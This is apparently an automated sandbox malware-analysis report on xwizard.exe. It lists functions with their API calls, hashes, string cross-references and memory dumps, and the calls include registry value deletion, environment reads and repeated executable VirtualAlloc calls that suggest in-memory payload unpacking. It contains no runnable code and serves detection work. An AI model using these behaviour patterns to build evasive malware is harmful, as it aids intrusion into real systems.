Instruction ID: 210422b194b1c769db9a9b51ef88a37ee0462c5d8974aa95260b86ae16cdeba8
Opcode Fuzzy Hash: 2c0d27171b227a626090942a01cb7e3bbf324c6d7aa291d0839ae4957e61f002
Instruction Fuzzy Hash: CC11F874809354AAC750DF26C54066FBBE4FB88B54F40882FF8C493241E73C9984DB57

Uniqueness

Uniqueness Score: -1.00%

Function 00413040, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

GetComputerNameW.KERNEL32 ref: 0041307E
WideCharToMultiByte.KERNEL32 ref: 004130C0

Strings

@, xrefs: 00413099

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: ByteCharComputerMultiNameWide
String ID: @
API String ID: 4013585866-2766056989
Opcode ID: 75619ece23197e83586e66bb1f33d7f654c3ffc02ea5a6723a4e8ea35ab2e647
Instruction ID: 7c038244dc2cd29586230534efa33881c9182a2f6df97460e627dabf8a714e70
Opcode Fuzzy Hash: 75619ece23197e83586e66bb1f33d7f654c3ffc02ea5a6723a4e8ea35ab2e647
Instruction Fuzzy Hash: 4F01C5B0409301AEE320AF26D99476BFBE4EF94714F10891EF49847291D3B985898B87

Uniqueness

Uniqueness Score: -1.00%

Function 004089ED, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00408A77

Part of subcall function 00410803: RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408A27), ref: 00410830
Part of subcall function 00410803: RegDeleteValueA.ADVAPI32 ref: 0041084B
Part of subcall function 00410803: RegCloseKey.ADVAPI32 ref: 0041085E

Strings

40B, xrefs: 00408A7C
<0B, xrefs: 00408A84

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: CloseDeleteOpenValuefclose
String ID: 40B$<0B
API String ID: 3171391837-2730254441
Opcode ID: e80744430c769008ed9aa6cab13524ccc618e940c92f136a1cd14b05883cfc76
Instruction ID: bb4ce6ad198e61c342c208a9868e2ee3a63cf1cfb8a338f91740164746fe8c6d
Opcode Fuzzy Hash: e80744430c769008ed9aa6cab13524ccc618e940c92f136a1cd14b05883cfc76
Instruction Fuzzy Hash: 1101B7B06087119AD700BF65D64526DBBE0AF40348F81C82FE4C86B286DBBD8485DB5F

Uniqueness

Uniqueness Score: -1.00%

Function 0040F483, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

getenv.MSVCRT ref: 0040F49D

Part of subcall function 004127A8: _vsnprintf.MSVCRT ref: 004127CC

getenv.MSVCRT ref: 0040F4C5

Part of subcall function 00406F1A: MultiByteToWideChar.KERNEL32 ref: 00406F53
Part of subcall function 00406F1A: GetFileAttributesW.KERNEL32 ref: 00406F5E

Strings

~;B, xrefs: 0040F4CA

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: getenv$AttributesByteCharFileMultiWide_vsnprintf
String ID: ~;B
API String ID: 2228561779-89019340
Opcode ID: 809e396fd2eab3f384f240020dfbce2e1602ed8e0f4d2e0b249a73290c3eb897
Instruction ID: d845c7456769ba672d696a4f857c2cede61afe7a33709c8199a018e4a54c7ca9
Opcode Fuzzy Hash: 809e396fd2eab3f384f240020dfbce2e1602ed8e0f4d2e0b249a73290c3eb897
Instruction Fuzzy Hash: 4B011AB4408311AAC720BF26E54515EBFE0EF90798F51C83EE4D85B282C37C9599CB4B

Uniqueness

Uniqueness Score: -1.00%

Function 0040F67B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

getenv.MSVCRT ref: 0040F695

Part of subcall function 004127A8: _vsnprintf.MSVCRT ref: 004127CC

getenv.MSVCRT ref: 0040F6BD

Part of subcall function 00406F1A: MultiByteToWideChar.KERNEL32 ref: 00406F53
Part of subcall function 00406F1A: GetFileAttributesW.KERNEL32 ref: 00406F5E

Strings

y<B, xrefs: 0040F6C2

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: getenv$AttributesByteCharFileMultiWide_vsnprintf
String ID: y<B
API String ID: 2228561779-1329648526
Opcode ID: fc2a22fba373fe480af829fa4f93533cae9eeeedbb52cd41ca872e91a74e92ad
Instruction ID: 8d0cb0fe6a7d44374a24ae0aebfd5b8dc36573b7fc8ec9374f5f00733d0f5b09
Opcode Fuzzy Hash: fc2a22fba373fe480af829fa4f93533cae9eeeedbb52cd41ca872e91a74e92ad
Instruction Fuzzy Hash: DF0108B5408311AAC720BF62E44515EBBE0AF80398F41C83EE4D867282C77C859ACB4B

Uniqueness

Uniqueness Score: -1.00%

Function 0040F281, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

getenv.MSVCRT ref: 0040F29B

Part of subcall function 004127A8: _vsnprintf.MSVCRT ref: 004127CC

getenv.MSVCRT ref: 0040F2C3

Part of subcall function 00406F1A: MultiByteToWideChar.KERNEL32 ref: 00406F53
Part of subcall function 00406F1A: GetFileAttributesW.KERNEL32 ref: 00406F5E

Strings

Y:B, xrefs: 0040F2A0

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: getenv$AttributesByteCharFileMultiWide_vsnprintf
String ID: Y:B
API String ID: 2228561779-559362792
Opcode ID: c10aa0f72dc7a85467b9bbaedbd08abfe9db542f1f8a5a634dc962c54ce382e1
Instruction ID: 71a4254163051be47397212b88bd25a6cdd91ad02d264920333697808a15e276
Opcode Fuzzy Hash: c10aa0f72dc7a85467b9bbaedbd08abfe9db542f1f8a5a634dc962c54ce382e1
Instruction Fuzzy Hash: 8E0108F4408311AAC710BF62E44515EBBE0AF80398F51C83EE4D86B282C37C8599CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040F772, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

getenv.MSVCRT ref: 0040F78C

Part of subcall function 004127A8: _vsnprintf.MSVCRT ref: 004127CC

getenv.MSVCRT ref: 0040F7B4

Part of subcall function 00406F1A: MultiByteToWideChar.KERNEL32 ref: 00406F53
Part of subcall function 00406F1A: GetFileAttributesW.KERNEL32 ref: 00406F5E

Strings

=B, xrefs: 0040F7B9

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: getenv$AttributesByteCharFileMultiWide_vsnprintf
String ID: =B
API String ID: 2228561779-94577219
Opcode ID: 6a4f4bd4eafef27ad3c46499d4e109de9b0001956a83309dcbd02ed961f098a6
Instruction ID: 2c5e5b9d49c5aa29139184a809ee8efa52bd93eb3b3edc2fc8ee47fb8fc21b8d
Opcode Fuzzy Hash: 6a4f4bd4eafef27ad3c46499d4e109de9b0001956a83309dcbd02ed961f098a6
Instruction Fuzzy Hash: B4011AB4408311AAD710BF22E54515EBBE0AF80758F41C83FE4D86B282C77C8599CF5B

Uniqueness

Uniqueness Score: -1.00%

Function 0041FB61, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON

Download Yara Rule

APIs

_assert.MSVCRT ref: 0041FBC9

Strings

@VB, xrefs: 0041FBBA
Q, xrefs: 0041FBB2

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: _assert
String ID: @VB$Q
API String ID: 1222420520-3995936320
Opcode ID: 0235047f58187a39db11c12d6489f25d2d41f666815d55729f68459e28030352
Instruction ID: 7f8f61c8df23ecb70e93ec12a44af74537505c36dafaf849a96d6b3a763fb17d
Opcode Fuzzy Hash: 0235047f58187a39db11c12d6489f25d2d41f666815d55729f68459e28030352
Instruction Fuzzy Hash: 07F0D4B060A701AFC740DF24E59461ABBF0BB88354F809D1EF8C887341D378A8889F4B

Uniqueness

Uniqueness Score: -1.00%

Function 0041FBD1, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON

Download Yara Rule

APIs

_assert.MSVCRT ref: 0041FC39

Strings

@VB, xrefs: 0041FC2A
[, xrefs: 0041FC22

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: _assert
String ID: @VB$[
API String ID: 1222420520-251187038
Opcode ID: 343805436fce073f30f9e3772ad0ce55764f1fd40facfd7e41a048709e32d194
Instruction ID: 7522fd779a263ea223225e18d5767f15b5394ac0b58d2b9c3ee1adf97f9dd600
Opcode Fuzzy Hash: 343805436fce073f30f9e3772ad0ce55764f1fd40facfd7e41a048709e32d194
Instruction Fuzzy Hash: 21F0DAB060E301AFC750DF24E58461ABBE0BB84354F809C1EF4C847341D378A8859F47

Uniqueness

Uniqueness Score: -1.00%

Function 0041FB00, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON

Download Yara Rule

APIs

_assert.MSVCRT ref: 0041FB59

Strings

@VB, xrefs: 0041FB4A
G, xrefs: 0041FB42

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: _assert
String ID: @VB$G
API String ID: 1222420520-452563729
Opcode ID: b3a8f99880f7f9beb1147c89cebaa8c77fdad5f330c299cffaa506392bb9eab4
Instruction ID: b6f19dba06b4df6abe6717679b5f2b9c21e239fc99e3fa564f48b7d25df68e10
Opcode Fuzzy Hash: b3a8f99880f7f9beb1147c89cebaa8c77fdad5f330c299cffaa506392bb9eab4
Instruction Fuzzy Hash: 6FF0D4B060A301AFC740DF24E18461EBBF0BB88354F809C1EF8C887341D37898849B47

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: xwizard.exe PID: 2040 Parent PID: 2872 xwizard.exeCOMMON

Execution Graph

Execution Coverage:	6.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	341
Total number of Limit Nodes:	15

Executed Functions

Function 00CC161A, Relevance: 4.6, APIs: 3, Instructions: 89
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LocalAlloc.KERNELBASE(00000040,00010007,?,0000006C,0000002E), ref: 00CC1645
GetSystemInfo.KERNELBASE(?,?,?,00000064,?,0000006C,0000002E), ref: 00CC1673

Memory Dump Source

Source File: 0000001E.00000002.688515806.0000000000CC0000.00000040.00000001.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_cc0000_xwizard.jbxd

Similarity

API ID: AllocInfoLocalSystem
String ID:
API String ID: 870874157-0
Opcode ID: 657872f51bbaebb2accd056cca8429ba098a0819191ba33d3b674b09dfc63153
Instruction ID: f7d199a747e6c5277fecb2fbea8d3a08929a76bbfb778f64d8cab05dffcb1231
Opcode Fuzzy Hash: 657872f51bbaebb2accd056cca8429ba098a0819191ba33d3b674b09dfc63153
Instruction Fuzzy Hash: 6721F431B40308A7DF25A6E6CC07FEE77659F82360F2C012CFA21B71C2DA60A941D761

Uniqueness

Uniqueness Score: -1.00%

Function 00CC1B78, Relevance: 91.7, APIs: 1, Strings: 60, Instructions: 212
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00000089,00003000,00000040,00000000,00000004,00000000), ref: 00CC1E42

Strings

3, xrefs: 00CC1C06
f, xrefs: 00CC1E07
L, xrefs: 00CC1C81
d, xrefs: 00CC1DB6
H, xrefs: 00CC1D1A
M, xrefs: 00CC1C9D
#, xrefs: 00CC1DE6
t, xrefs: 00CC1CFE
M, xrefs: 00CC1C61
(, xrefs: 00CC1CA1
}, xrefs: 00CC1CEA
], xrefs: 00CC1E23
g, xrefs: 00CC1CDD
H, xrefs: 00CC1CE1
H, xrefs: 00CC1DAE
g, xrefs: 00CC1CA5
$, xrefs: 00CC1C3A
g, xrefs: 00CC1C91
g, xrefs: 00CC1C7D
, xrefs: 00CC1D7A
, xrefs: 00CC1DBE
H, xrefs: 00CC1CA9
$, xrefs: 00CC1DDE
$, xrefs: 00CC1DFB
_, xrefs: 00CC1DC2
H, xrefs: 00CC1C56
M, xrefs: 00CC1DA6
7, xrefs: 00CC1D32
j, xrefs: 00CC1BFF
U, xrefs: 00CC1D86
H, xrefs: 00CC1D06
D, xrefs: 00CC1DDA
H, xrefs: 00CC1CF2
H, xrefs: 00CC1D6E
@, xrefs: 00CC1D6A
E, xrefs: 00CC1C89
}, xrefs: 00CC1D66
, xrefs: 00CC1C8D
8, xrefs: 00CC1CEE
g, xrefs: 00CC1D8E
0, xrefs: 00CC1DAA
g, xrefs: 00CC1D9A
L, xrefs: 00CC1C95
g, xrefs: 00CC1D7E
H, xrefs: 00CC1D46
H, xrefs: 00CC1C6D
U, xrefs: 00CC1C75
H, xrefs: 00CC1D36
H, xrefs: 00CC1CC9
t, xrefs: 00CC1D26
g, xrefs: 00CC1C69
E, xrefs: 00CC1CB1
W, xrefs: 00CC1CD9
g, xrefs: 00CC1D5E
U, xrefs: 00CC1BD5
u, xrefs: 00CC1CC1
0, xrefs: 00CC1CB5
g, xrefs: 00CC1C4F
|, xrefs: 00CC1D0E
H, xrefs: 00CC1D9E

Memory Dump Source

Source File: 0000001E.00000002.688515806.0000000000CC0000.00000040.00000001.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_cc0000_xwizard.jbxd

Similarity

API ID: AllocVirtual
String ID: $ $ $#$$$$$$$($0$0$3$7$8$@$D$E$E$H$H$H$H$H$H$H$H$H$H$H$H$H$L$L$M$M$M$U$U$U$W$]$_$d$f$g$g$g$g$g$g$g$g$g$g$j$t$t$u$|$}$}
API String ID: 4275171209-2925712947
Opcode ID: fc7789f14c41032a0f6f014d64f609681c8a40c3c6608ec152d403a356190e84
Instruction ID: 2302b3900cae5849df1f641d8aad758236a5126ff90e42290fdf3e76325f6e32
Opcode Fuzzy Hash: fc7789f14c41032a0f6f014d64f609681c8a40c3c6608ec152d403a356190e84
Instruction Fuzzy Hash: 27C19C509087D9D9DB22C6BC88487CDBFB11F27228F4842C9E1E87B2D2C7B90559D76A

Uniqueness

Uniqueness Score: -1.00%

Function 00CC21FB, Relevance: 91.7, APIs: 1, Strings: 60, Instructions: 211
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00000089,00003000,00000040,00000000,?,00000000), ref: 00CC24C4

Strings

H, xrefs: 00CC232B
M, xrefs: 00CC22E3
g, xrefs: 00CC2421
@, xrefs: 00CC23F1
D, xrefs: 00CC2461
g, xrefs: 00CC2313
H, xrefs: 00CC234B
M, xrefs: 00CC242D
H, xrefs: 00CC2425
|, xrefs: 00CC2395
H, xrefs: 00CC2363
W, xrefs: 00CC235B
}, xrefs: 00CC23ED
$, xrefs: 00CC2482
t, xrefs: 00CC23AD
g, xrefs: 00CC22D1
g, xrefs: 00CC2327
g, xrefs: 00CC2415
g, xrefs: 00CC22EB
t, xrefs: 00CC2385
g, xrefs: 00CC23E5
], xrefs: 00CC24AA
, xrefs: 00CC230F
8, xrefs: 00CC2370
0, xrefs: 00CC2431
U, xrefs: 00CC2257
7, xrefs: 00CC23B9
}, xrefs: 00CC236B
j, xrefs: 00CC2281
H, xrefs: 00CC23CD
u, xrefs: 00CC2343
H, xrefs: 00CC22EF
H, xrefs: 00CC2435
3, xrefs: 00CC2288
H, xrefs: 00CC23A1
U, xrefs: 00CC22F7
g, xrefs: 00CC22FF
U, xrefs: 00CC240D
H, xrefs: 00CC23F5
M, xrefs: 00CC231F
E, xrefs: 00CC230B
L, xrefs: 00CC2303
(, xrefs: 00CC2323
_, xrefs: 00CC2449
H, xrefs: 00CC2374
H, xrefs: 00CC23BD
g, xrefs: 00CC2405
H, xrefs: 00CC22D8
H, xrefs: 00CC238D
f, xrefs: 00CC248E
#, xrefs: 00CC246D
E, xrefs: 00CC2333
d, xrefs: 00CC243D
L, xrefs: 00CC2317
g, xrefs: 00CC235F
0, xrefs: 00CC2337
, xrefs: 00CC2401
$, xrefs: 00CC22BC
$, xrefs: 00CC2465
, xrefs: 00CC2445

Memory Dump Source

Source File: 0000001E.00000002.688515806.0000000000CC0000.00000040.00000001.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_cc0000_xwizard.jbxd

Similarity

API ID: AllocVirtual
String ID: $ $ $#$$$$$$$($0$0$3$7$8$@$D$E$E$H$H$H$H$H$H$H$H$H$H$H$H$H$L$L$M$M$M$U$U$U$W$]$_$d$f$g$g$g$g$g$g$g$g$g$g$j$t$t$u$|$}$}
API String ID: 4275171209-2925712947
Opcode ID: 02042ffe0461cb58b15a965031e803335d76ce3326182043199e5f65b6eacf16
Instruction ID: 3447d4a0270540792db88262317d9e944e8c6eb6530c2088ad25700f62586f0d
Opcode Fuzzy Hash: 02042ffe0461cb58b15a965031e803335d76ce3326182043199e5f65b6eacf16
Instruction Fuzzy Hash: 4BC19C509087D9D9DB22C6BC88487CDBFB11F27228F4842C9E1E87B2D2C7B90559D76A

Uniqueness

Uniqueness Score: -1.00%

Function 00CC253E, Relevance: 91.7, APIs: 1, Strings: 60, Instructions: 210
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00000089,00003000,00000040,00CC13BD,?,00000000), ref: 00CC2809

Strings

3, xrefs: 00CC25CD
(, xrefs: 00CC2668
g, xrefs: 00CC26A4
H, xrefs: 00CC26E6
}, xrefs: 00CC2732
U, xrefs: 00CC263C
H, xrefs: 00CC2634
M, xrefs: 00CC2664
d, xrefs: 00CC2782
g, xrefs: 00CC2630
, xrefs: 00CC2746
H, xrefs: 00CC273A
L, xrefs: 00CC265C
g, xrefs: 00CC275A
H, xrefs: 00CC26D2
|, xrefs: 00CC26DA
g, xrefs: 00CC2658
}, xrefs: 00CC26B0
E, xrefs: 00CC2650
W, xrefs: 00CC26A0
g, xrefs: 00CC2644
H, xrefs: 00CC2690
0, xrefs: 00CC267C
u, xrefs: 00CC2688
t, xrefs: 00CC26F2
, xrefs: 00CC278A
8, xrefs: 00CC26B4
H, xrefs: 00CC261D
H, xrefs: 00CC276A
H, xrefs: 00CC277A
E, xrefs: 00CC2678
g, xrefs: 00CC2766
L, xrefs: 00CC2648
H, xrefs: 00CC26B9
g, xrefs: 00CC2616
0, xrefs: 00CC2776
j, xrefs: 00CC25C6
M, xrefs: 00CC2772
g, xrefs: 00CC266C
U, xrefs: 00CC259C
$, xrefs: 00CC27AA
$, xrefs: 00CC27C7
g, xrefs: 00CC274A
f, xrefs: 00CC27D3
$, xrefs: 00CC2601
D, xrefs: 00CC27A6
7, xrefs: 00CC26FE
H, xrefs: 00CC2702
#, xrefs: 00CC27B2
M, xrefs: 00CC2628
_, xrefs: 00CC278E
t, xrefs: 00CC26CA
U, xrefs: 00CC2752
g, xrefs: 00CC272A
@, xrefs: 00CC2736
H, xrefs: 00CC2670
H, xrefs: 00CC26A8
H, xrefs: 00CC2712
, xrefs: 00CC2654
], xrefs: 00CC27EF

Memory Dump Source

Source File: 0000001E.00000002.688515806.0000000000CC0000.00000040.00000001.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_cc0000_xwizard.jbxd

Similarity

API ID: AllocVirtual
String ID: $ $ $#$$$$$$$($0$0$3$7$8$@$D$E$E$H$H$H$H$H$H$H$H$H$H$H$H$H$L$L$M$M$M$U$U$U$W$]$_$d$f$g$g$g$g$g$g$g$g$g$g$j$t$t$u$|$}$}
API String ID: 4275171209-2925712947
Opcode ID: 6f3a2eea8abb305929a6d0908b71b44a0d431887636ad71e889b87b230bc57ed
Instruction ID: 02e8c82e9c696cdf0d6d489f66e924e8ba129862c2ee59b639584ca2ebfb1464
Opcode Fuzzy Hash: 6f3a2eea8abb305929a6d0908b71b44a0d431887636ad71e889b87b230bc57ed
Instruction Fuzzy Hash: 11C19C509087D9D9DB22C6BC88487CDBFB11F27228F4842CDE1E87B2D2C7B90549D76A

Uniqueness

Uniqueness Score: -1.00%

Function 00CC1EBC, Relevance: 91.7, APIs: 1, Strings: 60, Instructions: 208
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00000089,00003000,00000040,?,?,?), ref: 00CC2181

Strings

H, xrefs: 00CC1F95
$, xrefs: 00CC2122
M, xrefs: 00CC1FDC
g, xrefs: 00CC20A2
#, xrefs: 00CC212A
H, xrefs: 00CC20F2
j, xrefs: 00CC1F3E
}, xrefs: 00CC20AA
D, xrefs: 00CC211E
g, xrefs: 00CC1FA8
H, xrefs: 00CC2020
, xrefs: 00CC2102
|, xrefs: 00CC2052
g, xrefs: 00CC20C2
g, xrefs: 00CC1FE4
, xrefs: 00CC1FCC
H, xrefs: 00CC2030
$, xrefs: 00CC213F
g, xrefs: 00CC20D2
0, xrefs: 00CC20EE
H, xrefs: 00CC207A
g, xrefs: 00CC1FBC
U, xrefs: 00CC1FB4
H, xrefs: 00CC208A
H, xrefs: 00CC204A
U, xrefs: 00CC1F14
t, xrefs: 00CC206A
8, xrefs: 00CC202C
H, xrefs: 00CC20E2
g, xrefs: 00CC201C
H, xrefs: 00CC20B2
M, xrefs: 00CC1FA0
0, xrefs: 00CC1FF4
, xrefs: 00CC20BE
7, xrefs: 00CC2076
_, xrefs: 00CC2106
H, xrefs: 00CC2008
W, xrefs: 00CC2018
g, xrefs: 00CC20DE
@, xrefs: 00CC20AE
U, xrefs: 00CC20CA
H, xrefs: 00CC1FE8
E, xrefs: 00CC1FC8
g, xrefs: 00CC1FD0
L, xrefs: 00CC1FD4
g, xrefs: 00CC1F8E
f, xrefs: 00CC214B
u, xrefs: 00CC2000
E, xrefs: 00CC1FF0
H, xrefs: 00CC1FAC
$, xrefs: 00CC1F79
3, xrefs: 00CC1F45
M, xrefs: 00CC20EA
H, xrefs: 00CC205E
], xrefs: 00CC2167
(, xrefs: 00CC1FE0
t, xrefs: 00CC203D
}, xrefs: 00CC2028
d, xrefs: 00CC20FA
L, xrefs: 00CC1FC0

Memory Dump Source

Source File: 0000001E.00000002.688515806.0000000000CC0000.00000040.00000001.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_cc0000_xwizard.jbxd

Similarity

API ID: AllocVirtual
String ID: $ $ $#$$$$$$$($0$0$3$7$8$@$D$E$E$H$H$H$H$H$H$H$H$H$H$H$H$H$L$L$M$M$M$U$U$U$W$]$_$d$f$g$g$g$g$g$g$g$g$g$g$j$t$t$u$|$}$}
API String ID: 4275171209-2925712947
Opcode ID: 4d53abd23ebdf4c1944fb11425371be08a052aa5783fbd8494affd5bfaa251c6
Instruction ID: cfde9dda9b6f5b757eb59aa9f78f91a1974501537a8854299b9b5b0af7d0903e
Opcode Fuzzy Hash: 4d53abd23ebdf4c1944fb11425371be08a052aa5783fbd8494affd5bfaa251c6
Instruction Fuzzy Hash: 4CC19C509087D9D9DB22C6BC88487CDBFB11F27228F4842CDE1E87B2D2C7B90559D76A

Uniqueness

Uniqueness Score: -1.00%

Function 00CC0430, Relevance: 36.1, APIs: 1, Strings: 23, Instructions: 105
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00000042,00003000,00000040), ref: 00CC054F

Strings

3, xrefs: 00CC0452
H, xrefs: 00CC04B9
U, xrefs: 00CC0436
g, xrefs: 00CC04A1
f, xrefs: 00CC051A
H, xrefs: 00CC0491
g, xrefs: 00CC048D
D, xrefs: 00CC04ED
H, xrefs: 00CC04A5
#, xrefs: 00CC04F9
M, xrefs: 00CC04C1
}, xrefs: 00CC04AD
], xrefs: 00CC0538
$, xrefs: 00CC050E
V, xrefs: 00CC0485
$, xrefs: 00CC0479
u, xrefs: 00CC0499
$, xrefs: 00CC04F1
_, xrefs: 00CC04D1
